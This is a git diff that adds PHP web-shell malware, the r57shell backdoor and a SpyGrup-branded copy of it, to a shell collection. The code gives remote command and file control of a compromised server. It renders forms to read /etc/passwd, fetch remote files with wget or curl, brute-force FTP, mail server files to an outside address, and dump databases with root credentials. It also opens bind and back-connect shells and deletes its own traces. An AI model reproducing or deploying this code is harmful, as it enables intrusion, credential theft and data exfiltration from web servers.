+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
+echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;  
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode&&$unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
+if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+if(@function_exists("ftp_connect")){
+echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($unix && @function_exists("ftp_connect")){
+echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
+echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@function_exists("mail")){
+echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option>MySQL</option>';
+if($mssql_on) $select .= '<option>MSSQL</option>';
+if($pg_on)    $select .= '<option>PostgreSQL</option>';
+if($ora_on)   $select .= '<option>Oracle</option>';
+$select .= '</select>';
+echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
+}
+if(!$safe_mode&&$unix){
+echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>";
+echo '</body></html>';
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/r577.php.php.txt b/xakep-shells/PHP/r577.php.php.txt
new file mode 100644
index 0000000..3d7547b
--- /dev/null
+++ b/xakep-shells/PHP/r577.php.php.txt
@@ -0,0 +1,1889 @@
+<?php
+/******************************************************************************************************/
+/* 
+/* 
+/*    ssssssss  pppp  pppp    yyyyyy  yyyyyy    gggg  gggg  rrrr  rrrr  uuuu    uuuu  pppp  pppp  
+/*  ss            pppp    pp    yy      yy    gg    gggg      rrrr        uu      uu    pppp    pp
+/*   ssssss      pp      pp      yy  yy      gg      gg      rr          uu      uu    pp      pp
+/*         ss    pp      pp      yy  yy      gg      gg      rr          uu    uuuu    pp      pp
+/* ssssssss      pppppppp          yy          gggggggg    rrrrrrrr        uuuu  uuuu  pppppppp  
+/*               pp                yy                gg                                pp        
+/*             pppppp          yyyyyy          gggggg                                pppppp      
+/* 
+/*                    admin@spygrup.org[Kruis]   -   yaduris@spygrup.org[YaduriS]
+/*
+/*
+/*  r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ???? ???????  ?? ??????? ????? ???????
+/*  ??????: 1.23
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/******************************************************************************************************/
+
+/* ~~~ ?????????  ~~~ */
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = "SpyGrup.Org SpeciaL";
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_SERVER as $k=>$v)
+  {
+  $_SERVER[$k] = stripslashes($v);
+  }
+ }
+
+/* ~~~ ?????????????? ~~~ */
+
+// $auth = 1; - ?????????????? ????????
+// $auth = 0; - ?????????????? ?????????
+$auth = 0;
+
+// ????? ? ?????? ??? ??????? ? ???????
+// ?? ???????? ??????? ????? ??????????? ?? ???????!!!
+$name='teufel'; // ????? ????????????
+$pass='spyms'; // ?????? ????????????
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="shell"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://www.spygrup.org>www.spygrup.org</a> : Access Denied</b>");
+   }
+}
+$head = '<!-- ??????????  ???? -->
+<html>
+<head>
+<title>shell</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.table1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR: #D4D0C8;
+}
+.td1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+font: 7pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT:  #eeeeee 1px outset;
+BORDER-TOP:    #eeeeee 1px outset;
+BORDER-LEFT:   #eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>';
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if ($_POST['cmd']=="db_query")
+ {
+  echo $head;
+  switch($_POST['db'])
+  {
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mysql_query($query,$db);
+      $error = @mysql_error($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@mysql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mysql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @mysql_free_result($res);
+      }
+     }
+   	@mysql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mssql_query($query,$db);
+      if (@mssql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mssql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */
+      @mssql_free_result($res);
+      }
+     }
+   	@mssql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+   {
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @pg_query($db,$query);
+      $error = @pg_errormessage($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@pg_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @pg_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @pg_free_result($res);
+      }
+     }
+   	@pg_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>";
+  break;
+  case 'Oracle':
+  $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']);
+  if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; }
+  else
+   {
+   $querys = @explode(';',$_POST['db_query']);
+   foreach($querys as $num=>$query)
+    {
+    if(strlen($query)>5) {
+    echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+    $stat = @ociparse($db, $query);
+    @ociexecute($stat);
+    if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; }
+    else
+     {
+     $rowcount = @ocirowcount($stat);
+     if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";}
+     else {
+     echo "<table width=100%><tr>";
+     for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; }
+     echo "</tr>";
+     while(ocifetch($stat))
+      {
+      echo "<tr>";
+      for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; }
+      echo "</tr>";
+      }
+     echo "</table><br>";
+     }
+     @ocifreestatement($stat);
+     }
+    }
+    }
+   @ocilogoff($db);
+   }
+  break;
+  }
+ echo "<form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
